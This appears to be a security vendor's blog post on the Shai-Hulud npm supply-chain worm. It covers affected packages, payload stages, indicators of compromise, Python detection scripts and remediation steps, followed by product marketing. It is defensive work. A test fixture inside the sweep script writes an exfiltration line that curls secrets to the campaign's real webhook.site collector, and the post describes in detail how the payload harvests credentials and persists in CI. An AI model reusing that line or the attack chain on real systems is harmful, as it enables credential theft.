react-jsonschema-form-conditionals@0.3.18 react-jsonschema-form-conditionals0.3.18PREVIOUS REPORT
react-jsonschema-form-conditionals@0.3.21 react-jsonschema-form-conditionals0.3.21PREVIOUS REPORT
react-jsonschema-form-extras@1.0.4 react-jsonschema-form-extras1.0.4PREVIOUS REPORT
react-jsonschema-rxnt-extras@0.4.9 react-jsonschema-rxnt-extras0.4.9PREVIOUS REPORT
remark-preset-lint-crowdstrike@4.0.1 remark-preset-lint-crowdstrike4.0.1PREVIOUS REPORT
remark-preset-lint-crowdstrike@4.0.2 remark-preset-lint-crowdstrike4.0.2PREVIOUS REPORT
rxnt-authentication@0.0.3 rxnt-authentication0.0.3PREVIOUS REPORT
rxnt-authentication@0.0.4 rxnt-authentication0.0.4PREVIOUS REPORT
rxnt-authentication@0.0.5 rxnt-authentication0.0.5PREVIOUS REPORT
rxnt-authentication@0.0.6 rxnt-authentication0.0.6PREVIOUS REPORT
rxnt-healthchecks-nestjs@1.0.2 rxnt-healthchecks-nestjs1.0.2PREVIOUS REPORT
rxnt-healthchecks-nestjs@1.0.3 rxnt-healthchecks-nestjs1.0.3PREVIOUS REPORT
rxnt-healthchecks-nestjs@1.0.4 rxnt-healthchecks-nestjs1.0.4PREVIOUS REPORT
rxnt-healthchecks-nestjs@1.0.5 rxnt-healthchecks-nestjs1.0.5PREVIOUS REPORT
rxnt-kue@1.0.4 rxnt-kue1.0.4PREVIOUS REPORT
rxnt-kue@1.0.5 rxnt-kue1.0.5PREVIOUS REPORT
rxnt-kue@1.0.6 rxnt-kue1.0.6PREVIOUS REPORT
rxnt-kue@1.0.7 rxnt-kue1.0.7PREVIOUS REPORT
swc-plugin-component-annotate@1.9.1 swc-plugin-component-annotate1.9.1PREVIOUS REPORT
swc-plugin-component-annotate@1.9.2 swc-plugin-component-annotate1.9.2PREVIOUS REPORT
tbssnch@1.0.2 tbssnch1.0.2PREVIOUS REPORT
teselagen-interval-tree@1.1.2 teselagen-interval-tree1.1.2PREVIOUS REPORT
tg-client-query-builder@2.14.4 tg-client-query-builder2.14.4PREVIOUS REPORT
tg-client-query-builder@2.14.5 tg-client-query-builder2.14.5PREVIOUS REPORT
tg-redbird@1.3.1 tg-redbird1.3.1PREVIOUS REPORT
tg-redbird@1.3.2 tg-redbird1.3.2PREVIOUS REPORT
tg-seq-gen@1.0.10 tg-seq-gen1.0.10PREVIOUS REPORT
tg-seq-gen@1.0.9 tg-seq-gen1.0.9PREVIOUS REPORT
thangved-react-grid@1.0.3 thangved-react-grid1.0.3PREVIOUS REPORT
ts-gaussian@3.0.5 ts-gaussian3.0.5PREVIOUS REPORT
ts-gaussian@3.0.6 ts-gaussian3.0.6PREVIOUS REPORT
ts-imports@1.0.1 ts-imports1.0.1PREVIOUS REPORT
ts-imports@1.0.2 ts-imports1.0.2PREVIOUS REPORT
tvi-cli@0.1.5 tvi-cli0.1.5PREVIOUS REPORT
ve-bamreader@0.2.6 ve-bamreader0.2.6PREVIOUS REPORT
ve-bamreader@0.2.7 ve-bamreader0.2.7PREVIOUS REPORT
ve-editor@1.0.1 ve-editor1.0.1PREVIOUS REPORT
ve-editor@1.0.2 ve-editor1.0.2PREVIOUS REPORT
verror-extra@6.0.1 verror-extra6.0.1PREVIOUS REPORT
voip-callkit@1.0.2 voip-callkit1.0.2PREVIOUS REPORT
voip-callkit@1.0.3 voip-callkit1.0.3PREVIOUS REPORT
wdio-web-reporter@0.1.3 wdio-web-reporter0.1.3PREVIOUS REPORT
yargs-help-output@5.0.3 yargs-help-output5.0.3PREVIOUS REPORT
yoo-styles@6.0.326 yoo-styles6.0.326PREVIOUS REPORT

The payload under the microscope

Stage 1: Recon and environment sweep

  • OS/arch profile using os.platform() and os.arch() to tailor a TruffleHog download.
  • Env dump to harvest any exported credentials: GITHUB_TOKEN, NPM_TOKEN, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, cloud CLI creds, and CI secrets that occasionally leak into runner envs.

Stage 2: Secrets harvesting

  • Local filesystem scan: invokes TruffleHog as a child process (trufflehog filesystem / --json) to trawl the whole disk for high-entropy secrets on developer machines or CI agents, so anything outside the environment (.npmrc, .aws/credentials, ~/.git-credentials, kubeconfigs) is in scope too.
  • Cloud secret managers: enumerates AWS Secrets Manager and GCP Secret Manager, with pagination and silent error handling. This is notable—many “npm malware” strains stop at environment variables; this one reaches into managed secret stores if credentials are present.

Stage 3: Token validation and lateral reach

  • npm identity: /-/whoami used to confirm token validity, then the code pivots to maintainer package discovery via registry search.
  • GitHub reach: if a token exists, calls /user and repo APIs, plants a workflow, and creates branches to persist the backdoor beyond the original host.

Stage 4: Persistence via GitHub Actions

  • Workflow path: .github/workflows/shai-hulud-workflow.yml.
  • Function: serialize secrets, double- or triple-base64 content, and POST to a webhook[.]site collector.
  • Risk: once committed, any future CI run leaks secrets again. Token rotation alone won’t save you unless you also remove the workflow and force a clean history.

Indicators of Compromise (IoCs)

  • Malicious file: bundle.js (the Webpack bundle injected into each republished package). Reported SHA-256 hashes of the variants seen so far:
    46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09
    de0e25a3e6c1e1e5998b306b7141b3dc4c0088da9d7bb47c1c00c91e6e4f85d6
    81d2a004a1bca6ef87a1caf7d0e0b355ad1764238e40ff6d1b1cb77ad4f595c3
    83a650ce44b2a9854802a7fb4c202877815274c129af49e6c2d1d5d5d55c501e
    4b2399646573bb737c4969563303d8ee2e9ddbd1b271f1ca9e35ea78062538db
    dc67467a39b70d1cd4c1f7f7a459b35058163592f4a9e8fb4dffcbba98ef210c
    b74caeaa75e077c99f7d44f46daaf9796a3be43ecf24f2a1fd381844669da777
  • Backdoor workflow: .github/workflows/shai-hulud-workflow.yml
  • C2 / exfil: https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7 (write it as webhook[.]site if sharing internally).
  • Suspicious behaviors: npm publish --force, TruffleHog invocation (trufflehog filesystem / --json), npm registry maintainer search (/v1/search?text=maintainer:), GitHub repo and contents writes, Secrets Manager API calls (ListSecrets, GetSecretValue). See the Socket write-up referenced below for the full behavioral breakdown.
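The indicators above are easiest to act on as a script. The following is an added example written for this page (not code from the original post, Socket or StepSecurity) that walks a checkout or node_modules tree and reports three things: any bundle.js whose SHA-256 is in the published hash set, the backdoor workflow at its known path, and any file that references the webhook.site collector. The sample tree it builds is a constructed fixture with a harmless stand-in workflow, not the real payload.

```python
"""Sweep a checkout or node_modules tree for the Shai-Hulud indicators listed above.

Three checks per file:
  * a bundle.js whose SHA-256 is one of the published hashes
  * the backdoor workflow at .github/workflows/shai-hulud-workflow.yml
  * any readable file that references the webhook.site collector URL
"""
import hashlib
import os
import re
import tempfile
from pathlib import Path

# SHA-256 hashes of bundle.js variants from the IoC list above.
BUNDLE_HASHES = {
    "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09",
    "de0e25a3e6c1e1e5998b306b7141b3dc4c0088da9d7bb47c1c00c91e6e4f85d6",
    "81d2a004a1bca6ef87a1caf7d0e0b355ad1764238e40ff6d1b1cb77ad4f595c3",
    "83a650ce44b2a9854802a7fb4c202877815274c129af49e6c2d1d5d5d55c501e",
    "4b2399646573bb737c4969563303d8ee2e9ddbd1b271f1ca9e35ea78062538db",
    "dc67467a39b70d1cd4c1f7f7a459b35058163592f4a9e8fb4dffcbba98ef210c",
    "b74caeaa75e077c99f7d44f46daaf9796a3be43ecf24f2a1fd381844669da777",
}
WORKFLOW_NAME = "shai-hulud-workflow.yml"
# Matches the collector whether it is written plainly or defanged with [.]
EXFIL_RE = re.compile(rb"webhook(?:\.|\[\.\])site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7")
MAX_READ = 8 * 1024 * 1024  # skip the content grep for anything larger than 8 MiB


def sha256_of(path):
    """Stream a file through SHA-256 so large bundles do not get slurped into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root):
    """Return sorted (indicator, path) pairs for every hit under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath, name)
            if not p.is_file():          # skip dangling symlinks and specials
                continue
            if name == "bundle.js" and sha256_of(p) in BUNDLE_HASHES:
                hits.append(("bundle.js-hash", str(p)))
            if name == WORKFLOW_NAME and Path(dirpath).name == "workflows":
                hits.append(("backdoor-workflow", str(p)))
            if p.stat().st_size <= MAX_READ and EXFIL_RE.search(p.read_bytes()):
                hits.append(("exfil-url", str(p)))
    return sorted(hits)


def build_sample_tree():
    """Constructed fixture (not real malware): a stand-in workflow that posts to the
    collector, a benign bundle.js, and one clean file."""
    root = tempfile.mkdtemp(prefix="shai-hulud-sweep-")
    wf = Path(root, "repo", ".github", "workflows")
    wf.mkdir(parents=True)
    (wf / WORKFLOW_NAME).write_text(
        "on: push\njobs:\n  leak:\n    runs-on: ubuntu-latest\n    steps:\n"
        "      - run: curl -d \"$SECRETS\" https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7\n"
    )
    nm = Path(root, "repo", "node_modules", "some-pkg")
    nm.mkdir(parents=True)
    (nm / "bundle.js").write_text("module.exports = () => 'benign';\n")
    Path(root, "repo", "README.md").write_text("nothing to see\n")
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for kind, path in sweep(target):
        print(f"{kind:18} {path}")
```

Point it at a clone or a CI workspace (python sweep.py /path/to/repo). Hash matching only catches bundle.js files that are byte-identical to a known variant, so the URL grep is the wider net; combine it with git log --all -- .github/workflows/shai-hulud-workflow.yml to find copies that were committed to a branch and later removed from the working tree.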

Immediate response playbook (copy/paste friendly)

1) Hunt and eradicate the packages

# Find every installed copy of an affected package; with a package name, npm ls walks nested copies too

npm ls @ctrl/tinycolor --all

# Remove it if it is a direct dependency (replace with your offenders)

npm uninstall @ctrl/tinycolor

# Drop cached tarballs of the bad versions so a later install cannot resolve them from cache

npm cache clean --force

Cross-check your lockfiles for any of the versions listed above; pin to known-good releases and re-vendor locks.

Note that npm uninstall only removes direct dependencies. A trojaned version pulled in transitively stays in the tree until you bump the parent or force a safe version with an overrides entry in package.json, so check the lockfile rather than trusting the uninstall.
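Because the affected versions mostly arrive as transitive dependencies, the check has to run over the lockfile, not over the top-level package.json. The following is an added example (not code from the original post) that reads a package-lock.json in either the v1 nested layout or the v2/v3 flat packages map and reports every installed copy whose name@version is on the affected list. AFFECTED is seeded with a subset of the versions listed above and should be extended with the full list; the lockfile embedded for the demo is constructed, and some-ui-kit is a hypothetical dependency.

```python
"""Report every resolved package@version in an npm lockfile, including nested
transitive copies, that matches the affected-version list."""
import json
from collections import defaultdict

# Subset of the affected versions listed on this page; extend with the full list.
AFFECTED = {
    "@ctrl/tinycolor": {"4.1.1", "4.1.2"},
    "angulartics2": {"14.1.1", "14.1.2"},
    "ngx-bootstrap": {"18.1.4", "19.0.3", "19.0.4", "20.0.3", "20.0.4", "20.0.5"},
    "ngx-toastr": {"19.0.1", "19.0.2"},
    "eslint-config-crowdstrike": {"11.0.2", "11.0.3"},
}


def _name_from_key(key):
    """Lockfile v2/v3 keys look like 'node_modules/a/node_modules/@s/b'; the package
    name is whatever follows the last 'node_modules/'."""
    return key.rsplit("node_modules/", 1)[-1]


def _walk_v1(deps, path, out):
    """Lockfile v1 nests each package's own 'dependencies' object recursively."""
    for name, meta in (deps or {}).items():
        here = path + [name]
        out.append((name, meta.get("version"), "/".join(here)))
        _walk_v1(meta.get("dependencies"), here, out)


def resolved_packages(lock):
    """Return (name, version, location) for every installed copy in a package-lock.json."""
    out = []
    if "packages" in lock:  # lockfileVersion 2 or 3
        for key, meta in lock["packages"].items():
            if not key:  # "" is the root project entry, not a dependency
                continue
            out.append((_name_from_key(key), meta.get("version"), key))
    else:  # lockfileVersion 1
        _walk_v1(lock.get("dependencies"), [], out)
    return out


def find_affected(lock):
    """Map 'name@version' -> list of install locations for every affected copy."""
    hits = defaultdict(list)
    for name, version, where in resolved_packages(lock):
        if version in AFFECTED.get(name, ()):
            hits[f"{name}@{version}"].append(where)
    return dict(hits)


# Constructed v3 lockfile for the demo: a clean top-level tinycolor, plus a trojaned
# copy nested under the hypothetical dependency "some-ui-kit", plus a bad ngx-toastr.
SAMPLE_LOCK = json.loads("""{
  "name": "demo", "lockfileVersion": 3, "packages": {
    "": {"name": "demo", "dependencies": {"@ctrl/tinycolor": "^4.0.0", "some-ui-kit": "^1.0.0"}},
    "node_modules/@ctrl/tinycolor": {"version": "4.1.0"},
    "node_modules/some-ui-kit": {"version": "1.0.0",
        "dependencies": {"@ctrl/tinycolor": "4.1.2", "ngx-toastr": "19.0.2"}},
    "node_modules/some-ui-kit/node_modules/@ctrl/tinycolor": {"version": "4.1.2"},
    "node_modules/ngx-toastr": {"version": "19.0.2"}
  }
}""")


if __name__ == "__main__":
    import sys
    with open(sys.argv[1]) if len(sys.argv) > 1 else None or __import__("io").StringIO(json.dumps(SAMPLE_LOCK)) as fh:
        lock = json.load(fh)
    for pkg, places in sorted(find_affected(lock).items()):
        print(f"AFFECTED {pkg}")
        for where in places:
            print(f"   at {where}")
```

Run it as python lockcheck.py package-lock.json in every repo and container build context; a hit under a nested node_modules path is exactly the case npm uninstall will not fix, and the location string tells you which parent to bump or override.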

2) Remove the GitHub Actions backdoor

# From each repo's root: delete the workflow, then commit and push the removal on every branch that carries it

rm -f .github/workflows/shai-hulud-workflow.yml

# Look for a lingering shai-hulud branch across all repos in an org

gh repo list YOUR_ORG --limit 1000 --json nameWithOwner --jq '.[].nameWithOwner' \
| while read -r repo; do
  gh api --paginate "repos/$repo/branches" --jq ".[] | select(.name == \"shai-hulud\") | \"$repo has branch: \" + .name"
done

# If found, delete it (keep a copy of the commit for forensics first)

git push origin --delete shai-hulud

The persistence risk sits in CI. Deleting the file locally does nothing until the removal is committed and pushed, and the workflow keeps running from any branch that still carries it. Scrub workflow files in all repos, including forks and archived projects where secrets still live.

3) Rotate credentials with blast-radius thinking

  • GitHub: personal access tokens, Actions secrets (org, env, repo), deploy keys, OAuth app grants.
  • npm: automation tokens and publish tokens—replace ~/.npmrc everywhere.
  • Cloud: AWS IAM keys, GCP SA keys, Azure SP credentials; regenerate and scope tightly.
  • Secret stores: rotate values in AWS Secrets Manager and GCP Secret Manager that were accessed during the window.

4) Audit logs for exploitation

  • AWS CloudTrail (examples; lookup-events covers the last 90 days of management events, which is where Secrets Manager API calls are recorded; add --start-time and --end-time to bound the window):

aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets

aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue

  • GCP Audit Logs (secret reads such as AccessSecretVersion only appear if Data Access audit logs are enabled for Secret Manager; Admin Activity events such as service account key creation are always logged):

gcloud logging read 'protoPayload.serviceName="secretmanager.googleapis.com"' --limit=200

gcloud logging read 'protoPayload.methodName="google.iam.admin.v1.CreateServiceAccountKey"' --limit=50
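The raw lookup-events output is hard to read at volume, and what you are really looking for is the enumerate-then-read pattern the payload produces: one ListSecrets followed by a burst of GetSecretValue from a single principal, source IP and user agent. The following is an added example (not code from the original post) that groups CloudTrail records by that triple and flags the sweep shape. The embedded records are constructed, the ARNs and IPs are placeholders, and the sweep threshold is an assumption to tune against your own baseline.

```python
"""Triage `aws cloudtrail lookup-events` JSON for Secrets Manager sweeps:
ListSecrets followed by a burst of GetSecretValue from one identity/IP/user-agent."""
import json
from collections import defaultdict

SWEEP_EVENTS = ("ListSecrets", "GetSecretValue", "BatchGetSecretValue")


def iter_events(lookup_output):
    """lookup-events returns Events[]; each record carries the raw trail event as a JSON string."""
    for rec in lookup_output.get("Events", []):
        yield json.loads(rec["CloudTrailEvent"])


def summarize(lookup_output):
    """Group Secrets Manager calls by (principal ARN, source IP, user agent)."""
    buckets = defaultdict(lambda: {"ListSecrets": 0, "GetSecretValue": 0, "secrets": set(), "times": []})
    for ev in iter_events(lookup_output):
        if ev.get("eventSource") != "secretsmanager.amazonaws.com" or ev.get("eventName") not in SWEEP_EVENTS:
            continue
        key = (ev.get("userIdentity", {}).get("arn", "?"), ev.get("sourceIPAddress"), ev.get("userAgent"))
        b = buckets[key]
        b["ListSecrets" if ev["eventName"] == "ListSecrets" else "GetSecretValue"] += 1
        secret_id = (ev.get("requestParameters") or {}).get("secretId")
        if secret_id:
            b["secrets"].add(secret_id)
        b["times"].append(ev["eventTime"])
    return dict(buckets)


def suspicious(summary, min_reads=3):
    """Flag any triple that enumerated secrets and then read at least min_reads of them.
    min_reads is an assumed threshold; a normal deploy rarely lists then reads in bulk."""
    return sorted(k for k, b in summary.items() if b["ListSecrets"] and b["GetSecretValue"] >= min_reads)


def _rec(time, name, arn, ip, ua, secret=None):
    """Build one lookup-events record for the constructed sample below."""
    ev = {"eventVersion": "1.08", "eventTime": time, "eventSource": "secretsmanager.amazonaws.com",
          "eventName": name, "userIdentity": {"arn": arn}, "sourceIPAddress": ip, "userAgent": ua,
          "requestParameters": {"secretId": secret} if secret else None}
    return {"EventName": name, "CloudTrailEvent": json.dumps(ev)}


CI_ARN = "arn:aws:sts::111122223333:assumed-role/ci-deploy/GitHubActions"   # placeholder
DEV_ARN = "arn:aws:iam::111122223333:user/alice"                            # placeholder
SAMPLE = {"Events": [  # constructed records, not a real trail
    _rec("2025-09-15T20:01:02Z", "ListSecrets", CI_ARN, "203.0.113.5", "aws-sdk-js/3.650.0"),
    _rec("2025-09-15T20:01:03Z", "GetSecretValue", CI_ARN, "203.0.113.5", "aws-sdk-js/3.650.0", "prod/db/password"),
    _rec("2025-09-15T20:01:03Z", "GetSecretValue", CI_ARN, "203.0.113.5", "aws-sdk-js/3.650.0", "prod/stripe/key"),
    _rec("2025-09-15T20:01:04Z", "GetSecretValue", CI_ARN, "203.0.113.5", "aws-sdk-js/3.650.0", "prod/npm/token"),
    _rec("2025-09-15T20:01:04Z", "GetSecretValue", CI_ARN, "203.0.113.5", "aws-sdk-js/3.650.0", "prod/github/pat"),
    _rec("2025-09-15T09:30:00Z", "GetSecretValue", DEV_ARN, "198.51.100.7", "aws-cli/2.17.0", "prod/db/password"),
    _rec("2025-09-15T09:31:00Z", "DescribeSecret", DEV_ARN, "198.51.100.7", "aws-cli/2.17.0", "prod/db/password"),
]}


if __name__ == "__main__":
    import sys
    data = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE  # pass saved lookup-events JSON
    summary = summarize(data)
    for key in suspicious(summary):
        arn, ip, ua = key
        b = summary[key]
        print(f"SUSPICIOUS {arn} from {ip} ({ua}): {b['GetSecretValue']} reads of {sorted(b['secrets'])}"
              f" between {min(b['times'])} and {max(b['times'])}")
```

Save the CLI output with --output json and feed the file in; every secret named in the flagged bucket goes on the rotation list in step 3. A CI role reading with a Node SDK user agent from a runner IP at a time with no matching deploy is the shape to expect from a compromised install step.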

5) Network containment

  • Block outbound to webhook.site at your egress controls and proxy. Search historical logs for requests to the exact exfil URL.

DevSecOps guardrails that actually change outcomes

This campaign rode on two realities: trust in maintainer updates and permissive publish paths. You can blunt both.

Package intake discipline for npm

  • Adopt a cooldown: delay brand-new package versions by 48–72h in pipelines. Most malicious releases get caught inside a day. StepSecurity’s Package Cooldown Check automates this gate. pnpm added a minimumReleaseAge setting for the same reason; similar features exist in Taze/NCU workflows.
  • Artifact provenance: require provenance/SLSA attestations where available; block un-attested publishes in CI.
  • Lockfile policy: single owner for dependency updates, reproducible builders, and a rule that no production deploy occurs within the same PR that bumps a critical transitive unless a security exception is signed.
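A cooldown gate needs nothing more than the publish timestamps the registry already serves in a package's metadata document (the time map in GET https://registry.npmjs.org/<name>). The following is an added example (not code from the original post, and not pnpm's or StepSecurity's implementation) that refuses a version published less than a configurable number of hours ago and, for a range or latest tag, picks the newest version that has cleared the cooldown. The packument fragment is constructed and its timestamps are illustrative.

```python
"""Release-age (cooldown) gate on npm registry metadata: deny a version that was
published less than MIN_AGE_HOURS ago, and resolve 'latest' to the newest cooled one."""
from datetime import datetime, timedelta, timezone

MIN_AGE_HOURS = 72  # page recommends 48-72h; assumed default here


def parse_npm_time(s):
    """Registry timestamps look like 2025-09-15T19:07:11.803Z (UTC, trailing Z)."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def release_age(packument, version, now):
    """Age of a published version as a timedelta, or None if the version is unknown."""
    ts = packument.get("time", {}).get(version)
    return None if ts is None else now - parse_npm_time(ts)


def gate(packument, version, now, min_age_hours=MIN_AGE_HOURS):
    """Return (allowed, reason) for installing `version` right now."""
    age = release_age(packument, version, now)
    if age is None:
        return False, "version not present in registry metadata"
    if age < timedelta(hours=min_age_hours):
        hours = age.total_seconds() / 3600
        return False, f"published {hours:.1f}h ago, below the {min_age_hours}h cooldown"
    return True, "ok"


def newest_cooled(packument, now, min_age_hours=MIN_AGE_HOURS):
    """Most recently published version that has cleared the cooldown, or None.
    Use this instead of dist-tags.latest when resolving an unpinned range."""
    cooled = [
        (parse_npm_time(ts), v)
        for v, ts in packument["time"].items()
        if v not in ("created", "modified") and gate(packument, v, now, min_age_hours)[0]
    ]
    return max(cooled)[1] if cooled else None


# Constructed packument fragment; versions and timestamps are illustrative only.
SAMPLE_PACKUMENT = {
    "name": "example-lib",
    "dist-tags": {"latest": "2.3.2"},
    "time": {
        "created": "2020-01-01T00:00:00.000Z",
        "modified": "2025-09-15T19:10:00.000Z",
        "2.3.0": "2025-07-01T12:00:00.000Z",
        "2.3.1": "2025-09-15T19:07:11.803Z",
        "2.3.2": "2025-09-15T19:10:00.000Z",
    },
}
NOW = datetime(2025, 9, 16, 12, 0, tzinfo=timezone.utc)  # roughly 17h after the last publish


if __name__ == "__main__":
    for v in ("2.3.0", "2.3.1", "2.3.2"):
        print(v, gate(SAMPLE_PACKUMENT, v, NOW))
    print("latest is", SAMPLE_PACKUMENT["dist-tags"]["latest"],
          "but install", newest_cooled(SAMPLE_PACKUMENT, NOW))
```

In a real pipeline you fetch the packument for each package in the lockfile diff of a PR and fail the check when gate() denies any new version; the two back-to-back publishes minutes apart in the sample are the shape a maintainer-account takeover produces, and a 72h delay would have left both outside the install window while the community triage happened.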

Publisher and registry hygiene

  • Publisher hardening: enforce hardware-backed 2FA for maintainer accounts; avoid email-based factors and account recovery paths that route through the same mailbox; monitor corporate mail for 2FA-reset phishing, the lure that opens most maintainer takeovers.
  • Automated anomaly detection: watch for publishes that do not originate from your authorized CI/CD. Tools like StepSecurity Artifact Monitor or equivalent homegrown checks can flag “hand-pushed” packages.

GitHub Actions blast-radius controls

  • Mandatory review for workflow changes (workflow file-path protections + CODEOWNERS).
  • Untrusted code path: run npm install for untrusted branches and external PRs on isolated runners with no org secrets; set permissions: at the job level and default it to read-all so GITHUB_TOKEN cannot push branches or write workflow files.
  • Secret minimalism: expose no secrets to a job by default and add them per job only where needed; prefer OIDC with constrained audience and subject claims over long-lived PATs, so a leaked token is scoped and short-lived.

Build agent hardening

  • Egress filters for runners; e.g., block webhook.site and similar pastebins.
  • Read-only tokens where possible; ephemeral tokens everywhere else.
  • Filesystem risk: developer laptops and CI hosts often hold .npmrc, .aws/credentials, and ~/.git-credentials. Treat them as secrets vaults; disk encryption and agent isolation aren’t “nice to have”.

How ASPM helps you get ahead of the next one

You can’t win this with scanners alone. You need continuous context:

  • Unified risk view across code → pipeline → runtime
    Map where each dependency lands, which pipelines can publish, what secrets live in those pipelines, and which apps inherit those risks. That’s ASPM territory: one backlog per team, dedupe by context, and focus remediation where reachability and blast radius intersect.
  • Reachability-aware dependency policy
    If a trojanized library is unreachable at runtime, don’t halt a release; if it’s reachable in critical paths, raise the gate. Tie this to your SCA/SBOM and CI policy so the decision is automatic.
  • Provenance-based exceptions
    Write the rule once: only allow npm publishes signed by your CI service account with attested provenance; quarantine everything else. When the next attack drops, your policy blocks it by default while you investigate.
  • Campaign-based remediation
    Treat this like a campaign: remove backdoor workflow, rotate tokens, re-pin affected versions, sweep org repos. Track it in your vulnerability management backlog as a single supply chain incident with child tasks per team—this reduces fatigue versus spraying dozens of tickets.

Triage checklist for security and platform teams

  1. Inventory: generate a dependency SBOM and diff against the version list above.
  2. Resolve: pin to safe versions; rebuild containers and serverless layers.
  3. Pipelines: scan repos for .github/workflows/shai-hulud-workflow.yml; delete; force a clean commit that removes it; protect the workflows/ path.
  4. Secrets: rotate npm, GitHub, cloud, and third-party tokens; re-issue OIDC workloads.
  5. Forensics: search logs for webhook.site egress and CloudTrail/GCP Secret Manager access.
  6. Comms: notify impacted developers; share detox steps for local machines (remove backdoor workflow clones, clear caches, re-auth CLI tools).
  7. Policy: enable version cooldown and provenance gates in PR checks; require approvals for workflow changes.

Notes on maintainers and attribution

  • The npm account scttcper (Scott Cooper) publishes many @ctrl/* libraries, including @ctrl/tinycolor. Treat any installs of recently published versions with care and verify the source timeline before unblocking.
  • Initial alert: credits include Daniel dos Santos Pereira for flagging the suspicious @ctrl/tinycolor update; Socket and StepSecurity published deep dives and kept the package list current as the story evolved.

References and further reading

  • StepSecurity: full technical breakdown, IoCs, remediation guidance for the bundle.js campaign.
  • Socket Research: analysis of the tinycolor incident and Nx attack wave; lists affected versions and details on token validation, AI-assisted exfil in related incidents.
  • The Hacker News: concise summary of the 40-package compromise with the fixed package list and exfil workflow details.
  • npm maintainer profile (scttcper) for publisher context and recent publishes.
  • Daniel Pereira for the initial alert

Final word: hold the line on package intake

Speed is the attacker’s ally here: release, wait for installs, drain secrets, and ride CI persistence. Slow them down. Bake cooldown, provenance, and workflow-path protections into your DevSecOps pipelines. Let your ASPM practice decide what gets blocked, what gets quarantined, and what needs a hotfix, based on reachability and blast radius.

Get on top of your code and container vulnerabilities with Phoenix Security Actionable ASPM


Organizations often face an overwhelming volume of security alerts, including false positives and duplicate vulnerabilities, which can distract from real threats. Traditional tools may overwhelm engineers with lengthy, misaligned lists that fail to reflect business objectives or the risk tolerance of product owners.

Phoenix Security offers a transformative solution through its Actionable Application Security Posture Management (ASPM), powered by AI-based Contextual Quantitative analysis. This innovative approach correlates runtime data with code analysis to deliver a single, prioritized list of vulnerabilities. This list is tailored to the specific needs of engineering teams and aligns with executive goals, reducing noise and focusing efforts on the most critical issues.

Why do people talk about Phoenix?

Automated Triage: Phoenix streamlines the triage process using a customizable 4D risk formula, ensuring critical vulnerabilities are addressed promptly by the right teams.

Contextual Deduplication: Utilizing canary token-based traceability, Phoenix accurately deduplicates and tracks vulnerabilities within application code and deployment environments, allowing teams to concentrate on genuine threats.

Actionable Threat Intelligence: Phoenix provides real-time insights into vulnerabilities’ exploitability, combining runtime threat intelligence with application security data for precise risk mitigation.


By leveraging Phoenix Security, you not only unravel the potential threats but also take a significant stride in vulnerability management, ensuring your application security remains up to date and focuses on the key vulnerabilities.


Get a demo with your data, test Reachability Analysis and ASPM

Francesco is an internationally renowned public speaker, with multiple interviews in high-profile publications (eg. Forbes), and an author of numerous books and articles, who utilises his platform to evangelize the importance of Cloud security and cutting-edge technologies on a global scale.

Discuss this blog with our community on Slack

Join our AppSec Phoenix community on Slack to discuss this blog and other news with our professional security team

From our Blog

Most enterprises drown in vulnerability data yet starve for attribution. By mapping ownership, location, exposure, and business impact, Phoenix Security’s ASPM turns that swamp into a laser‑focused task list. Only then do three autonomous agents—Researcher, Analyzer, and Remediator—kick in, collaborating to recommend fixes and workflow automation that 10× security‑engineering output. Skip the context and you’ll waste money, requests, tokens, carbon, and human patience on hallucinated advice. For startups, the focus is clear—establish visibility and ensure core security practices are in place. Application Security Posture Management (ASPM) tools provide a straightforward, automated approach to detecting vulnerabilities and enforcing policies. These solutions help reduce risk quickly without overburdening small security teams. Mature organizations, on the other hand, are tackling a different set of problems. With the sheer number of vulnerabilities and an increasingly complicated threat landscape, enterprises need to fine-tune their approach. The goal shifts toward intelligent remediation, leveraging real-time threat intelligence and advanced risk prioritization. ASPM tools at this stage do more than just detect vulnerabilities—they provide context, enable proactive decision-making, and streamline the entire remediation process. The emergence of AI-assisted code generation has further complicated security in both environments. These tools, while speeding up development, are often responsible for introducing new vulnerabilities into applications at a faster pace than traditional methods. The challenge is clear: AI-generated code can hide flaws that are difficult to catch in the rush of innovation. Both startups and enterprises need to adjust their security posture to account for these new risks. ASPM platforms, like Phoenix Security, provide automated scanning of code before it hits production, ensuring that flaws don’t make it past the first line of defense. 
Meanwhile, organizations are also grappling with the backlog crisis in the National Vulnerability Database (NVD). A staggering number of CVEs remain unprocessed, leaving many businesses with limited data on which to base their patching decisions. While these delays leave companies vulnerable, Phoenix Security steps in by cross-referencing CVE data with known exploits and live threat intelligence, helping organizations stay ahead despite the lag in official vulnerability reporting. Whether just starting their security program or managing a complex infrastructure, organizations need a toolset that adapts with them. Phoenix Security enables businesses of any size to prioritize vulnerabilities based on actual risk, not just theoretical impact, helping security teams navigate the evolving threat landscape with speed and accuracy.
Francesco Cipollone
Shai Hulud weaponised npm’s trust model: stolen maintainer creds, poisoned tarballs, and stealthy GitHub Actions that exfiltrate secrets and persist in CI. 500+ packages were touched in days, starting with @ctrl/tinycolor. This analysis maps the blast radius and delivers a practical remediation plan—pin versions, block direct npm with a proxy, rotate tokens, and strip backdoor workflows—grounded in ASPM and reachability.
Francesco Cipollone
A coordinated npm compromise hit @ctrl/tinycolor and dozens of related packages. The payload auto-trojanizes maintainers’ projects, scans for GitHub/NPM/cloud creds using TruffleHog, plants a backdoor GitHub Actions workflow, and exfiltrates to a webhook. This piece breaks down the attack chain and lays out decisive DevSecOps and ASPM actions to contain and harden.
Francesco Cipollone
Derek

Derek Fisher

Head of product security at a global fintech

Derek Fisher – Head of product security at a global fintech. Speaker, instructor, and author in application security.

